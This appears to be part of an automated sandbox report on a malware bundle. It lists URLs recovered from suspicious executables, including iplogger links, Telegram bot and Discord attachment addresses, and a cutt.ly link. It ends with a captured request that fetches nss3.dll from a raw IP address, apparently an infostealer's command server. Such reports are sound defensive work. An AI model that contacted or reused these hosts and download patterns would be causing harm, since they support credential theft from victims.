Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.870686698.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.870686698.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.870686698.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.870686698.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: ordo_sec666.exe, 00000023.00000002.815468008.000000000084A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: ordo_sec666.exe, 00000023.00000002.815468008.000000000084A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: ordo_sec666.exe, 00000023.00000002.815468008.000000000084A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: WSkT8d093C.exe	String found in binary or memory: http://www.company.com/
Source: WSkT8d093C.exe	String found in binary or memory: http://www.company.com/83886080NewProduct000100NewProduct1NewProduct
Source: softokn3.dll.20.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: sqlite3.dll.20.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: Np8Ya6aNEbkh.20.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: craw_window.js.3.dr	String found in binary or memory: https://accounts.google.com/MergeSession
Source: WSkT8d093C.exe, namdoitntn.exe, 0000001A.00000000.343257573.00000000002F2000.00000002.00000001.01000000.00000009.sdmp, namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000000.356865696.00000000003F3000.00000002.00000001.01000000.0000000E.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000000.371239903.0000000000153000.00000002.00000001.01000000.00000014.sdmp, ffnameedit.exe.1.dr	String found in binary or memory: https://api.ip.sb/ip
Source: SETUP_~1.EXE, 00000028.00000002.873395936.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, SETUP_~1.EXE, 00000028.00000002.872396022.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: real.exe, 0000001D.00000000.347251788.0000000000FF3000.00000002.00000001.01000000.0000000C.sdmp, real.exe, 0000001D.00000002.795454230.0000000000FF3000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://c.im/
Source: SETUP_~1.EXE, 00000028.00000002.844033249.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com
Source: SETUP_~1.EXE, 00000028.00000002.844033249.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, SETUP_~1.EXE, 00000028.00000002.844008041.0000000002BF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/1006526153294618657/1009394950338781266/2.0.2-beta_Nwjkxkwv.j
Source: Np8Ya6aNEbkh.20.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: pnacl_public_x86_64_libpnacl_irt_shim_dummy_a.3.dr	String found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-clang.git
Source: pnacl_public_x86_64_libpnacl_irt_shim_dummy_a.3.dr	String found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-llvm.git
Source: SETUP_~1.EXE, 00000028.00000002.840936360.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cutt.ly
Source: SETUP_~1.EXE, 00000028.00000000.454216766.0000000000682000.00000002.00000001.01000000.00000019.sdmp, SETUP_~1.EXE, 00000028.00000002.836139503.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, SETUP_~1.EXE.34.dr	String found in binary or memory: https://cutt.ly/IXlgfrm
Source: ordo_sec666.exe, 00000023.00000002.815468008.000000000084A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: ordo_sec666.exe, 00000023.00000002.815468008.000000000084A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: ordo_sec666.exe, 00000023.00000002.815468008.000000000084A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0.
Source: real.exe, 0000001D.00000003.406128336.0000000010269000.00000004.00000800.00020000.00000000.sdmp, 65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBD4EA3DA
Source: Np8Ya6aNEbkh.20.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: namdoitntn.exe, 0000001A.00000002.876305445.0000000002733000.00000004.00000800.00020000.00000000.sdmp, real.exe, 0000001D.00000003.415474239.000000001026B000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.877046785.000000000335A000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.876098932.0000000002A38000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.872582969.00000000026A6000.00000004.00000800.00020000.00000000.sdmp, Np8Ya6aNEbkh.20.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Np8Ya6aNEbkh.20.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: real.exe, 0000001D.00000000.347251788.0000000000FF3000.00000002.00000001.01000000.0000000C.sdmp, real.exe, 0000001D.00000002.795454230.0000000000FF3000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://freebl3.dll
Source: brokerius.exe, 00000021.00000002.795622343.0000000000D14000.00000002.00000001.01000000.0000000F.sdmp, brokerius.exe, 00000021.00000000.360138360.0000000000D14000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: https://freebl3.dllmozglue.dllmsvcp140.dllnss3.dllsoftokn3.dllvcruntime140.dll
Source: WW1.exe, 00000025.00000000.377440161.00000000012D3000.00000002.00000001.01000000.00000015.sdmp, WW1.exe, 00000025.00000002.792118576.00000000012D3000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://freebl3.dllmozglue.dllmsvcp140.dllnss3.dllsoftokn3.dllvcruntime140.dllsdkjfh134bjk1gh2
Source: craw_window.js.3.dr, craw_background.js.3.dr	String found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
Source: WSkT8d093C.exe, 00000001.00000003.377876577.00000000020A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1AAh
Source: real.exe, 0000001D.00000003.406219338.0000000010274000.00000004.00000800.00020000.00000000.sdmp, WSkT8d093C.exe, 65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	String found in binary or memory: https://iplogger.org/1AAmX4
Source: 65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	String found in binary or memory: https://iplogger.org/1AAmX41AAmX4
Source: WSkT8d093C.exe, 00000001.00000003.377876577.00000000020A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1AEX
Source: real.exe, 0000001D.00000003.406219338.0000000010274000.00000004.00000800.00020000.00000000.sdmp, WSkT8d093C.exe, 65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	String found in binary or memory: https://iplogger.org/1AEmX4
Source: WSkT8d093C.exe	String found in binary or memory: https://iplogger.org/1AEmX40100https://iplogger.org/1ARmX40100https://iplogger.org/1AAmX40100https:/
Source: 65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	String found in binary or memory: https://iplogger.org/1AEmX41AEmX4
Source: WSkT8d093C.exe, 00000001.00000003.377876577.00000000020A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1AF
Source: real.exe, 0000001D.00000003.406219338.0000000010274000.00000004.00000800.00020000.00000000.sdmp, WSkT8d093C.exe, 65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	String found in binary or memory: https://iplogger.org/1AFmX4
Source: 65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	String found in binary or memory: https://iplogger.org/1AFmX41AFmX4
Source: real.exe, 0000001D.00000003.406219338.0000000010274000.00000004.00000800.00020000.00000000.sdmp, WSkT8d093C.exe, 65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	String found in binary or memory: https://iplogger.org/1AGmX4
Source: 65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	String found in binary or memory: https://iplogger.org/1AGmX41AGmX4
Source: WSkT8d093C.exe, 00000001.00000003.377876577.00000000020A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1AGx
Source: WSkT8d093C.exe, 00000001.00000003.377876577.00000000020A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1AJ
Source: real.exe, 0000001D.00000003.406219338.0000000010274000.00000004.00000800.00020000.00000000.sdmp, WSkT8d093C.exe, 65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	String found in binary or memory: https://iplogger.org/1AJmX4
Source: 65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	String found in binary or memory: https://iplogger.org/1AJmX41AJmX4
Source: WSkT8d093C.exe, 00000001.00000003.377876577.00000000020A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1AK
Source: real.exe, 0000001D.00000003.406219338.0000000010274000.00000004.00000800.00020000.00000000.sdmp, WSkT8d093C.exe, 65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	String found in binary or memory: https://iplogger.org/1AKmX4
Source: 65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	String found in binary or memory: https://iplogger.org/1AKmX41AKmX4
Source: WSkT8d093C.exe, 00000001.00000003.377876577.00000000020A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1AR
Source: real.exe, 0000001D.00000003.406219338.0000000010274000.00000004.00000800.00020000.00000000.sdmp, WSkT8d093C.exe, 65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	String found in binary or memory: https://iplogger.org/1ARmX4
Source: 65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	String found in binary or memory: https://iplogger.org/1ARmX41ARmX4
Source: WSkT8d093C.exe, 00000001.00000003.377876577.00000000020A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1AV
Source: real.exe, 0000001D.00000003.406219338.0000000010274000.00000004.00000800.00020000.00000000.sdmp, WSkT8d093C.exe, 65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	String found in binary or memory: https://iplogger.org/1AVmX4
Source: 65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	String found in binary or memory: https://iplogger.org/1AVmX41AVmX4
Source: WSkT8d093C.exe, 00000001.00000003.377876577.00000000020A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1AZ
Source: real.exe, 0000001D.00000003.406219338.0000000010274000.00000004.00000800.00020000.00000000.sdmp, WSkT8d093C.exe, 65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	String found in binary or memory: https://iplogger.org/1AZmX4
Source: 65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	String found in binary or memory: https://iplogger.org/1AZmX41AZmX4
Source: WSkT8d093C.exe, 00000001.00000002.406893797.0000000003940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1AZmX4C:
Source: brokerius.exe, 00000021.00000002.795622343.0000000000D14000.00000002.00000001.01000000.0000000F.sdmp, brokerius.exe, 00000021.00000000.360138360.0000000000D14000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: https://mas.to/
Source: softokn3.dll.20.dr	String found in binary or memory: https://mozilla.org0
Source: 1f258733-5a5e-4c9c-bae9-78250cbbfc3a_Zone.Identifier.43.dr	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1659361537155&target=OPTIMIZATION_TARGET_
Source: craw_window.js.3.dr	String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: craw_window.js.3.dr	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: namdoitntn.exe, 0000001A.00000002.876305445.0000000002733000.00000004.00000800.00020000.00000000.sdmp, real.exe, 0000001D.00000003.415474239.000000001026B000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.877046785.000000000335A000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.876098932.0000000002A38000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.872582969.00000000026A6000.00000004.00000800.00020000.00000000.sdmp, Np8Ya6aNEbkh.20.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: namdoitntn.exe, 0000001A.00000002.876305445.0000000002733000.00000004.00000800.00020000.00000000.sdmp, real.exe, 0000001D.00000003.415474239.000000001026B000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.877046785.000000000335A000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.876098932.0000000002A38000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.872582969.00000000026A6000.00000004.00000800.00020000.00000000.sdmp, Np8Ya6aNEbkh.20.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: real.exe, 0000001D.00000003.415474239.000000001026B000.00000004.00000800.00020000.00000000.sdmp, Np8Ya6aNEbkh.20.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: namdoitntn.exe, 0000001A.00000002.876305445.0000000002733000.00000004.00000800.00020000.00000000.sdmp, real.exe, 0000001D.00000003.415474239.000000001026B000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.877046785.000000000335A000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.876098932.0000000002A38000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.872582969.00000000026A6000.00000004.00000800.00020000.00000000.sdmp, Np8Ya6aNEbkh.20.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: 59095662396535248957003083.29.dr	String found in binary or memory: https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erro
Source: 59095662396535248957003083.29.dr	String found in binary or memory: https://support.google.com/chrome/answer/6315198?product=
Source: real.exe, 0000001D.00000003.406219338.0000000010274000.00000004.00000800.00020000.00000000.sdmp, 65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	String found in binary or memory: https://support.google.com/chrome?p=update_error
Source: 59095662396535248957003083.29.dr	String found in binary or memory: https://support.google.com/chrome?p=update_errorFix
Source: 59095662396535248957003083.29.dr	String found in binary or memory: https://support.google.com/installer/?product=
Source: real.exe, 0000001D.00000002.803649116.000000000121A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: real.exe, 0000001D.00000002.803649116.000000000121A000.00000004.00000020.00020000.00000000.sdmp, real.exe, 0000001D.00000000.347251788.0000000000FF3000.00000002.00000001.01000000.0000000C.sdmp, real.exe, 0000001D.00000002.790881623.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, real.exe, 0000001D.00000002.795454230.0000000000FF3000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://t.me/spmhaus
Source: real.exe, 0000001D.00000002.803649116.000000000121A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/spmhausB
Source: real.exe, 0000001D.00000000.347251788.0000000000FF3000.00000002.00000001.01000000.0000000C.sdmp, real.exe, 0000001D.00000002.795454230.0000000000FF3000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://t.me/spmhaushttps://c.im/
Source: brokerius.exe, 00000021.00000002.795622343.0000000000D14000.00000002.00000001.01000000.0000000F.sdmp, brokerius.exe, 00000021.00000000.360138360.0000000000D14000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: https://t.me/v_total
Source: brokerius.exe, 00000021.00000002.795622343.0000000000D14000.00000002.00000001.01000000.0000000F.sdmp, brokerius.exe, 00000021.00000000.360138360.0000000000D14000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: https://t.me/v_totalhttps://mas.to/
Source: real.exe, 0000001D.00000003.362730952.00000000012BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: craw_window.js.3.dr, craw_background.js.3.dr	String found in binary or memory: https://www-googleapis-staging.sandbox.google.com
Source: softokn3.dll.20.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: craw_window.js.3.dr	String found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
Source: namdoitntn.exe, 0000001A.00000002.876305445.0000000002733000.00000004.00000800.00020000.00000000.sdmp, real.exe, 0000001D.00000003.415474239.000000001026B000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.877046785.000000000335A000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.876098932.0000000002A38000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.872582969.00000000026A6000.00000004.00000800.00020000.00000000.sdmp, Np8Ya6aNEbkh.20.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: craw_window.js.3.dr	String found in binary or memory: https://www.google.com/images/cleardot.gif
Source: craw_window.js.3.dr	String found in binary or memory: https://www.google.com/images/dot2.gif
Source: craw_window.js.3.dr	String found in binary or memory: https://www.google.com/images/x2.gif
Source: craw_background.js.3.dr	String found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
Source: 59095662396535248957003083.29.dr	String found in binary or memory: https://www.google.com/intl/en_uk/chrome/
Source: 65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	String found in binary or memory: https://www.google.com/intl/en_uk/chrome/Google
Source: real.exe, 0000001D.00000003.406128336.0000000010269000.00000004.00000800.00020000.00000000.sdmp, 65360530329811159659501815.29.dr, 59095662396535248957003083.29.dr	String found in binary or memory: https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google
Source: 59095662396535248957003083.29.dr	String found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
Source: 59095662396535248957003083.29.dr	String found in binary or memory: https://www.google.com/search?q=chrome&oq=chrome&aqs=chrome..69i57j0j5l3j69i60l3.2663j0j4&sourceid=c
Source: craw_window.js.3.dr, craw_background.js.3.dr	String found in binary or memory: https://www.googleapis.com
Source: SETUP_~1.EXE, 00000028.00000003.490335384.0000000005AEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: SETUP_~1.EXE, 00000028.00000003.490335384.0000000005AEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown

DNS traffic detected: queries for: iplogger.org

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe

Code function: 20_2_00407EDB LocalAlloc,LocalAlloc,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalFree,WideCharToMultiByte,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,lstrlen,lstrcpyn,LocalFree,LocalFree,GetFileSize,LocalAlloc,lstrlen,lstrcpyn,ReadFile,ReadFile,CloseHandle,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalAlloc,lstrlen,lstrcpyn,lstrcpyn,lstrlen,LocalFree,InternetOpenW,InternetSetOptionW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,HttpOpenRequestW,lstrlenW,HttpSendRequestW,HttpSendRequestW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrlen,MultiByteToWideChar,MultiByteToWideChar,LocalAlloc,lstrlen,MultiByteToWideChar,MultiByteToWideChar,LocalFree,LocalFree,LocalFree,LocalFree,

20_2_00407EDB

Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 45.95.11.158Connection: Keep-AliveCache-Control: no-cache
